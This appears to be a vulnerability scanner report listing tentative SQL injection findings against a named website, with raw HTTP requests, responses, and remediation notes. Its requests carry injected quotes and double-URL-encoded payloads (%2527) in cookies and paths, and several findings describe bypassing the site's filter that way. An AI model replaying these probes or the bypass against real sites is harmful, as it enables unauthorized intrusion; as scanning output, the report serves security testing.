HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:51:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:51:22 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:51:22 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:48:20 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:48:20 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.200. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[&1'=1 New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:54:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[&1''=1 New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:54:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:54:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:54:31 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:53:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:53:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:53:51 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:53:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:51:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:51:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:51:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:51:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw&format=html&titleheader=[ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:50:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw&format=html&titleheader=[ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=109&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwOTpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXNhbi1qb3NlLTIwMTAmdmlldz1hcnRpY2xlJmxheW91dD1kZWZhdWx0JmNvbW1lbnR0eXBlPTIw Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:50:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:50:49 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:50:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The undefined parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the undefined parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /joobi/user/media%2527/images/captcha/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /joobi/user/media%2527%2527/images/captcha/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /modules%2527/mod_fpss/includes/elements/categories.php HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 